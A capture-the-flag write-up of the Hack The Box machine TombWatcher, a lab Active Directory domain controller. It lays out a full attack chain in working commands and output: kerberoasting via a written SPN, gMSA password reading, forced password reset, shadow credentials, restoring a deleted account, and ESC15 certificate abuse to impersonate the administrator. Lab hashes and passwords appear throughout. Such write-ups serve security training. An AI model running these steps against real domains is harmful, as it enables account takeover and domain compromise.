HTB | TombWatcher
Machine - https://app.hackthebox.com/machines/TombWatcher
IP - 10.129.13.255
Machine Information - As is common in real life Windows pentests, you will start the TombWatcher box with credentials for the following account: henry / H3nry_987TGV!
NMAP
└─$ nmap -sT -p- --min-rate 10000 10.129.13.255 -Pn -oA nmap_ports
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-06-08 11:59 IST
Nmap scan report for 10.129.13.255
Host is up (0.61s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49666/tcp open unknown
49677/tcp open unknown
49678/tcp open unknown
49679/tcp open unknown
49695/tcp open unknown
49701/tcp open unknown
49739/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 257.02 seconds└─$ nmap -sC -sV -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49677,49678,49679,49695,49701,49739 10.129.13.255 -Pn -oA nmap_ports_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-06-08 12:12 IST
Nmap scan report for 10.129.13.255
Host is up (0.59s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-08 10:42:30Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
|_ssl-date: 2025-06-08T10:44:11+00:00; +4h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-08T10:44:09+00:00; +3h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-08T10:44:10+00:00; +3h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-08T10:44:09+00:00; +3h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC
49701/tcp open msrpc Microsoft Windows RPC
49739/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-06-08T10:43:29
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 3h59m58s, deviation: 0s, median: 3h59m58s
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 114.75 seconds
Port 53
└─$ dig ANY @10.129.13.255 tombwatcher.htb
; <<>> DiG 9.20.8-6-Debian <<>> ANY @10.129.13.255 tombwatcher.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 54208
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 3
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;tombwatcher.htb. IN ANY
;; ANSWER SECTION:
tombwatcher.htb. 600 IN A 10.129.13.255
tombwatcher.htb. 3600 IN NS dc01.tombwatcher.htb.
tombwatcher.htb. 3600 IN SOA dc01.tombwatcher.htb. hostmaster.tombwatcher.htb. 250 900 600 86400 3600
tombwatcher.htb. 600 IN AAAA dead:beef::e7e7:fbeb:fe8d:9099
;; ADDITIONAL SECTION:
dc01.tombwatcher.htb. 1200 IN A 10.129.13.255
dc01.tombwatcher.htb. 1200 IN AAAA dead:beef::e7e7:fbeb:fe8d:9099
;; Query time: 375 msec
;; SERVER: 10.129.13.255#53(10.129.13.255) (TCP)
;; WHEN: Sun Jun 08 12:22:45 IST 2025
;; MSG SIZE rcvd: 198
Port 80
We can run auxiliary/scanner/http/iis_shortname_scanner to check for shortname in IIS
msf6 > use auxiliary/scanner/http/iis_shortname_scanner
msf6 auxiliary(scanner/http/iis_shortname_scanner) > set rhosts 10.129.13.255
rhosts => 10.129.13.255
msf6 auxiliary(scanner/http/iis_shortname_scanner) > run
[*] Running module against 10.129.13.255
[*] Scanning in progress...
[+] Found 1 directories
[+] <http://10.129.13.255/aspnet*~1>
[*] No files were found
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/iis_shortname_scanner) > on running dirsearch
└─$ dirsearch -u <http://10.129.13.255/> -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See <https://setuptools.pypa.io/en/latest/pkg_resources.html>
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/anurag/htb/TombWatcher/reports/http_10.129.13.255/__25-06-08_12-26-32.txt
Target: <http://10.129.13.255/>
[12:26:33] Starting:
[12:27:45] 301 - 158B - /aspnet_client -> <http://10.129.13.255/aspnet_client/>
[12:28:16] 400 - 3KB - /docpicker/internal_proxy/https/127.0.0.1:9043/ibm/console
[12:28:36] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
[12:28:36] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/help/*
[12:28:36] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo
[12:28:36] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd
[12:28:36] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable
[12:28:36] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned
[12:28:36] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties
[12:28:36] 400 - 3KB - /jolokia/exec/java.lang:type=Memory/gc
[12:28:36] 400 - 3KB - /jolokia/read/java.lang:type=*/HeapMemoryUsage
[12:28:36] 400 - 3KB - /jolokia/search/*:j2eeType=J2EEServer,*
[12:28:36] 400 - 3KB - /jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used
[12:28:36] 400 - 3KB - /jolokia/write/java.lang:type=Memory/Verbose/true
Task CompletedWe saw similar /aspnet_client/ on our is scanner let’s add this to the path and run again
msf6 auxiliary(scanner/http/iis_shortname_scanner) > set path /aspnet_client/
path => /aspnet_client/
msf6 auxiliary(scanner/http/iis_shortname_scanner) > run
[*] Running module against 10.129.13.255
[*] Scanning in progress...
[+] Found 1 directories
[+] <http://10.129.13.255/aspnet_client/system*~1>
[*] No files were found
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/iis_shortname_scanner) > Let’s fuzz for system*~1, and for that let’s make the wordlist
└─$ grep "^system" /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt > system_fuzz.txtLet’s fuzz
└─$ wfuzz -c -w system_fuzz.txt -u <http://10.129.13.255/aspnet_client/FUZZ> --hc 404
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: <http://10.129.13.255/aspnet_client/FUZZ>
Total requests: 40
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000004: 301 1 L 10 W 169 Ch "system_web"
Total time: 0
Processed Requests: 40
Filtered Requests: 39
Requests/sec.: 0add this to the path and run the is scanner
msf6 auxiliary(scanner/http/iis_shortname_scanner) > set path /aspnet_client/system_web/
path => /aspnet_client/system_web/
msf6 auxiliary(scanner/http/iis_shortname_scanner) > run
[*] Running module against 10.129.13.255
[*] Scanning in progress...
[-] Unable to connect to 10.129.13.255
[-] Unable to connect to 10.129.13.255
[+] Found 1 directories
[+] <http://10.129.13.255/aspnet_client/system_web/4_0_30*~1>
[*] No files were found
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/iis_shortname_scanner) > BloodHound
Since we have the credentials, let’s use Bloodhound
└─$ bloodhound-python -u henry -p 'H3nry_987TGV!' -d tombwatcher.htb -ns 10.129.13.255 -c All --zipFoothold/shell
Shell as John
WriteSPN
We found that henry@tombwatcher.htb -> WriteSPN -> Alfred@tombwatcher.htb
The user HENRY@TOMBWATCHER.HTB has the ability to write to the "serviceprincipalname" attribute to the user ALFRED@TOMBWATCHER.HTB.
So let’s set the SPN for Alfred
└─$ bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u henry -p 'H3nry_987TGV!' set object 'Alfred' servicePrincipalName -v 'anurag/htb'
[+] Alfred's servicePrincipalName has been updatedNow we can perform kerberoasting
└─$ netexec ldap tombwatcher.htb -u henry -p 'H3nry_987TGV!' --kerberoasting kerberoast.txt
OR
└─$ impacket-GetUserSPNs -request tombwatcher.htb/henry:'H3nry_987TGV!' -dc-ip 10.129.13.255Let’s use hashcat for cracking
└─$ hashcat kerberoast.txt /home/anurag/stuff/rockyou.txtNow we have Alfred’s password
Looking back on Bloodhound, we get Alfred@tombwatcher.htb -> AddSelf -> Infrastructure@tombwatcher.htb
The user ALFRED@TOMBWATCHER.HTB has the ability to add itself, to the group INFRASTRUCTURE@TOMBWATCHER.HTB. Because of security group delegation, the members of a security group have the same privileges as that group.
By adding itself to the group, ALFRED@TOMBWATCHER.HTB will gain the same privileges that INFRASTRUCTURE@TOMBWATCHER.HTB already has.
└─$ bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u Alfred -p "basketball" add groupMember Infrastructure 'Alfred'
[+] Alfred added to InfrastructureReadGMSAPassword
Infrastructure@tombwather.htb -> ReadGMSAPassword -> Ansible_dev@tombwatcher.htb
ANSIBLE_DEV$@TOMBWATCHER.HTB is a Group Managed Service Account. The group INFRASTRUCTURE@TOMBWATCHER.HTB can retrieve the password for the GMSA ANSIBLE_DEV$@TOMBWATCHER.HTB.
Group Managed Service Accounts are a special type of Active Directory object, where the password for that object is mananaged by and automatically changed by Domain Controllers on a set interval (check the MSDS-ManagedPasswordInterval attribute).
The intended use of a GMSA is to allow certain computer accounts to retrieve the password for the GMSA, then run local services as the GMSA. An attacker with control of an authorized principal may abuse that privilege to impersonate the GMSA.
Since we are the member of the group Infrastructure we should be able to read ansible_dev$'s GMSA Managed Password
there are two ways from which we can get the password
to clone gMSADumper and run
└─$ python3 gMSADumper.py -u Alfred -p basketball -d "tombwatcher.htb"
Users or groups who can read password for ansible_dev$:
> Infrastructure
ansible_dev$:::1c37d00093dc2a5f25176bf2d474afdc
ansible_dev$:aes256-cts-hmac-sha1-96:526688ad2b7ead7566b70184c518ef665cc4c0215a1d634ef5f5bcda6543b5b3
ansible_dev$:aes128-cts-hmac-sha1-96:91366223f82cd8d39b0e767f0061fd9a
to use bloodyad
└─$ bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u Alfred -p "basketball" get object --resolve-sd 'ansible_dev$' --attr msDS-ManagedPassword
distinguishedName: CN=ansible_dev,CN=Managed Service Accounts,DC=tombwatcher,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:1c37d00093dc2a5f25176bf2d474afdc
msDS-ManagedPassword.B64ENCODED: IIwfpSnxGqOGf+d99xuIBTCl3yqtm6fvywv4pBqe5PN9jsYcLAWn3x1doYf9ZzjBXGB3XoRzPFNwtajDOG304xGmN2CJ4G+5QsLACGGVvu3ZoG4aosUdfpEGuWyYqSyKggtxHtssw1lWLbrZayfWqascdDtBvuaszTpJgmDnLykE6QP+BmmngEkfETLuZ+hH0pP896TujqasQXFyOBkqwVtvXe1Lx9szud4//XTPoejE0KBihHGhzmbQ8pGH9QR9zl21XsohXJA2dd9QAUwgGpCssBhbOPtAalPoaOYDlBE4wrFZNnrYpADsIeYVO/HmXVnGO1e/9XRjcSCEZaHvTw==Now we have NTLM hash of ansible_dev
ForceChangePassword
Ansible_DEV$@rombwatcher.htb -> ForceChangePassword -> Sam@tombwatcher.htb
The user ANSIBLE_DEV$@TOMBWATCHER.HTB has the capability to change the user SAM@TOMBWATCHER.HTB's password without knowing that user's current password.
Let’s change the password
└─$ bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u ansible_dev$ -p :1c37d00093dc2a5f25176bf2d474afdc set password sam "P@ssw0rd@123"
[+] Password changed successfully!WriteOwner
Sam@tombwatcher.htb -> WriteOwner -> John@tombwatcher.htb
The user SAM@TOMBWATCHER.HTB has the ability to modify the owner of the user JOHN@TOMBWATCHER.HTB.
Object owners retain the ability to modify object security descriptors, regardless of permissions on the object's DACL.
Let’s set the owner to SAM
└─$ bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u "sam" -p "P@ssw0rd@123" set owner john sam
[+] Old owner S-1-5-21-1392491010-1358638721-2126982587-512 is now replaced by sam on johnShadow Credential
Next, let's give ourselves genericAll permissions on John
└─$ bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u "sam" -p "P@ssw0rd@123" add genericAll John Alfred
[+] Alfred has now GenericAll on JohnNow we can perform shadow credential to get john’s cred
└─$ certipy shadow auto -account 'john' -u 'alfred@tombwatcher.htb' -p 'basketball' -dc-ip 10.129.13.255
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'john'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'b08a3fff-008b-4d2f-16a6-313993ac1d8e'
[*] Adding Key Credential with device ID 'b08a3fff-008b-4d2f-16a6-313993ac1d8e' to the Key Credentials for 'john'
[*] Successfully added Key Credential with device ID 'b08a3fff-008b-4d2f-16a6-313993ac1d8e' to the Key Credentials for 'john'
[*] Authenticating as 'john' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'john@tombwatcher.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'john.ccache'
[*] Wrote credential cache to 'john.ccache'
[*] Trying to retrieve NT hash for 'john'
[*] Restoring the old Key Credentials for 'john'
[*] Successfully restored the old Key Credentials for 'john'
[*] NT hash for 'john': ad9324754583e3e42b55aad4d3b8d2bf
Now we can winrm via hash
and get the user.txt
Privilege Escalation
John@tombwatcher.htb -> GenericAll -> ADCS@tombwatcher.htb
The user JOHN@TOMBWATCHER.HTB has GenericAll privileges to the OU ADCS@TOMBWATCHER.HTB.
This is also known as full control. This privilege allows the trustee to manipulate the target object however they wish.
I will check this later (might be able to get us somewhere)
Tombstone
What are Tombstones in Active Directory?
When you delete an object from the Active Directory (AD) database, it’s marked as a tombstone object instead of being fully removed. By default, each tombstone object remains in the database for 180 days. Once this tombstone’s lifetime value is exceeded, the tombstone object is automatically deleted by the garbage collection process. Administrators can change the default tombstone lifetime value by using the ADSI Edit tool.
refers to this article
*Evil-WinRM* PS C:\\Users\\john\\Desktop> Get-ADObject -Filter {isDeleted -eq $True -and name -ne "Deleted Objects"} -IncludeDeletedObjects -Properties *
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : tombwatcher.htb/Deleted Objects/cert_admin
DEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
CN : cert_admin
DEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
codePage : 0
countryCode : 0
Created : 11/15/2024 7:55:59 PM
createTimeStamp : 11/15/2024 7:55:59 PM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=cert_admin\\0ADEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3,CN=Deleted Objects,DC=tombwatcher,DC=htb
dSCorePropagationData : {11/15/2024 7:56:05 PM, 11/15/2024 7:56:02 PM, 12/31/1600 7:00:01 PM}
givenName : cert_admin
instanceType : 4
isDeleted : True
LastKnownParent : OU=ADCS,DC=tombwatcher,DC=htb
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 11/15/2024 7:57:59 PM
modifyTimeStamp : 11/15/2024 7:57:59 PM
msDS-LastKnownRDN : cert_admin
Name : cert_admin
DEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
objectSid : S-1-5-21-1392491010-1358638721-2126982587-1109
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 133761921597856970
sAMAccountName : cert_admin
sDRightsEffective : 7
sn : cert_admin
userAccountControl : 66048
uSNChanged : 12975
uSNCreated : 12844
whenChanged : 11/15/2024 7:57:59 PM
whenCreated : 11/15/2024 7:55:59 PM
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : tombwatcher.htb/Deleted Objects/cert_admin
DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358
CN : cert_admin
DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358
codePage : 0
countryCode : 0
Created : 11/16/2024 12:04:05 PM
createTimeStamp : 11/16/2024 12:04:05 PM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=cert_admin\\0ADEL:c1f1f0fe-df9c-494c-bf05-0679e181b358,CN=Deleted Objects,DC=tombwatcher,DC=htb
dSCorePropagationData : {11/16/2024 12:04:18 PM, 11/16/2024 12:04:08 PM, 12/31/1600 7:00:00 PM}
givenName : cert_admin
instanceType : 4
isDeleted : True
LastKnownParent : OU=ADCS,DC=tombwatcher,DC=htb
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 11/16/2024 12:04:21 PM
modifyTimeStamp : 11/16/2024 12:04:21 PM
msDS-LastKnownRDN : cert_admin
Name : cert_admin
DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : c1f1f0fe-df9c-494c-bf05-0679e181b358
objectSid : S-1-5-21-1392491010-1358638721-2126982587-1110
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 133762502455822446
sAMAccountName : cert_admin
sDRightsEffective : 7
sn : cert_admin
userAccountControl : 66048
uSNChanged : 13171
uSNCreated : 13161
whenChanged : 11/16/2024 12:04:21 PM
whenCreated : 11/16/2024 12:04:05 PM
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : tombwatcher.htb/Deleted Objects/cert_admin
DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
CN : cert_admin
DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
codePage : 0
countryCode : 0
Created : 11/16/2024 12:07:04 PM
createTimeStamp : 11/16/2024 12:07:04 PM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=cert_admin\\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb
dSCorePropagationData : {11/16/2024 12:07:10 PM, 11/16/2024 12:07:08 PM, 12/31/1600 7:00:00 PM}
givenName : cert_admin
instanceType : 4
isDeleted : True
LastKnownParent : OU=ADCS,DC=tombwatcher,DC=htb
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 11/16/2024 12:07:27 PM
modifyTimeStamp : 11/16/2024 12:07:27 PM
msDS-LastKnownRDN : cert_admin
Name : cert_admin
DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
objectSid : S-1-5-21-1392491010-1358638721-2126982587-1111
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 133762504248946345
sAMAccountName : cert_admin
sDRightsEffective : 7
sn : cert_admin
userAccountControl : 66048
uSNChanged : 13197
uSNCreated : 13186
whenChanged : 11/16/2024 12:07:27 PM
whenCreated : 11/16/2024 12:07:04 PM
Remember to find the
LASTESTdeleted object as the other objects will have had their permissions revoked.
We can find the object cert_admin let's bring it back to life!
*Evil-WinRM* PS C:\\Users\\john\\Desktop> Restore-ADObject -Identity "CN=cert_admin\\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb"
*Evil-WinRM* PS C:\\Users\\john\\Desktop> GenericAll
Let’s check what permissions we have on cert_admin
└─$ bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u john -p :ad9324754583e3e42b55aad4d3b8d2bf get writable
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=tombwatcher,DC=htb
permission: WRITE
distinguishedName: CN=john,CN=Users,DC=tombwatcher,DC=htb
permission: WRITE
distinguishedName: OU=ADCS,DC=tombwatcher,DC=htb
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE
distinguishedName: CN=cert_admin,OU=ADCS,DC=tombwatcher,DC=htb
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE
We have genericAll on cert_admin
Let’s use shadow credentail to get the hash
Shadow Credential
└─$ certipy shadow auto -account 'cert_admin' -u 'john@tombwatcher.htb' -hashes ad9324754583e3e42b55aad4d3b8d2bf -dc-ip 10.129.13.255
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'cert_admin'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'a7db0ca8-580f-88c1-6ac9-5692216a9609'
[*] Adding Key Credential with device ID 'a7db0ca8-580f-88c1-6ac9-5692216a9609' to the Key Credentials for 'cert_admin'
[*] Successfully added Key Credential with device ID 'a7db0ca8-580f-88c1-6ac9-5692216a9609' to the Key Credentials for 'cert_admin'
[*] Authenticating as 'cert_admin' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'cert_admin@tombwatcher.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'cert_admin.ccache'
[*] Wrote credential cache to 'cert_admin.ccache'
[*] Trying to retrieve NT hash for 'cert_admin'
[*] Restoring the old Key Credentials for 'cert_admin'
[*] Successfully restored the old Key Credentials for 'cert_admin'
[*] NT hash for 'cert_admin': f87ebf0febd9c4095c68a88928755773Now we have hash for cert_admin
ESC 15
Now we can check for a vulnerable template
└─$ certipy find -u cert_admin -hashes :f87ebf0febd9c4095c68a88928755773 -target 10.129.13.255 -text -stdout -vulnerable
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'tombwatcher-CA-1' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'tombwatcher-CA-1'
[*] Checking web enrollment for CA 'tombwatcher-CA-1' @ 'DC01.tombwatcher.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : tombwatcher-CA-1
DNS Name : DC01.tombwatcher.htb
Certificate Subject : CN=tombwatcher-CA-1, DC=tombwatcher, DC=htb
Certificate Serial Number : 3428A7FC52C310B2460F8440AA8327AC
Certificate Validity Start : 2024-11-16 00:47:48+00:00
Certificate Validity End : 2123-11-16 00:57:48+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : TOMBWATCHER.HTB\\Administrators
Access Rights
ManageCa : TOMBWATCHER.HTB\\Administrators
TOMBWATCHER.HTB\\Domain Admins
TOMBWATCHER.HTB\\Enterprise Admins
ManageCertificates : TOMBWATCHER.HTB\\Administrators
TOMBWATCHER.HTB\\Domain Admins
TOMBWATCHER.HTB\\Enterprise Admins
Enroll : TOMBWATCHER.HTB\\Authenticated Users
Certificate Templates
0
Template Name : WebServer
Display Name : Web Server
Certificate Authorities : tombwatcher-CA-1
Enabled : True
Client Authentication : False
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 1
Validity Period : 2 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2024-11-16T00:57:49+00:00
Template Last Modified : 2024-11-16T17:07:26+00:00
Permissions
Enrollment Permissions
Enrollment Rights : TOMBWATCHER.HTB\\Domain Admins
TOMBWATCHER.HTB\\Enterprise Admins
TOMBWATCHER.HTB\\cert_admin
Object Control Permissions
Owner : TOMBWATCHER.HTB\\Enterprise Admins
Full Control Principals : TOMBWATCHER.HTB\\Domain Admins
TOMBWATCHER.HTB\\Enterprise Admins
Write Owner Principals : TOMBWATCHER.HTB\\Domain Admins
TOMBWATCHER.HTB\\Enterprise Admins
Write Dacl Principals : TOMBWATCHER.HTB\\Domain Admins
TOMBWATCHER.HTB\\Enterprise Admins
Write Property Enroll : TOMBWATCHER.HTB\\Domain Admins
TOMBWATCHER.HTB\\Enterprise Admins
TOMBWATCHER.HTB\\cert_admin
[+] User Enrollable Principals : TOMBWATCHER.HTB\\cert_admin
[!] Vulnerabilities
ESC15 : Enrollee supplies subject and schema version is 1.
[*] Remarks
ESC15 : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.We can see ESC15, let’s exploit
ESC15, also known by the community name "EKUwu" (research by Justin Bollinger from TrustedSec) and tracked as CVE-2024-49019, describes a vulnerability affecting unpatched CAs. It allows an attacker to inject arbitrary Application Policies into a certificate issued from a Version 1 (Schema V1) certificate template. If the CA has not been updated with the relevant security patches (Nov 2024), it will incorrectly include these attacker-supplied Application Policies in the issued certificate. This occurs even if these policies are not defined in, or are inconsistent with, the template's intended Extended Key Usages (EKUs), thereby granting the certificate unintended capabilities.
Step 1: Request a certificate, injecting "Client Authentication" Application Policy and target UPN.
└─$ certipy req -u 'cert_admin@tombwatcher.htb' -hashes :f87ebf0febd9c4095c68a88928755773 -dc-ip 10.129.13.255 -target 'tombwatcher.htb' -ca 'tombwatcher-CA-1' -template 'WebServer' -upn 'administrator@tombwatcher.htb' -sid 'S-1-5-21-1392491010-1358638721-2126982587-500' -application-policies 'Client Authentication'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 3
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@tombwatcher.htb'
[*] Certificate object SID is 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'Step 2: Authenticate via Schannel (LDAPS) using the obtained certificate.
└─$ certipy auth -pfx 'administrator.pfx' -dc-ip '10.129.13.255' -ldap-shell
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@tombwatcher.htb'
[*] SAN URL SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Security Extension SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Connecting to 'ldaps://10.129.13.255:636'
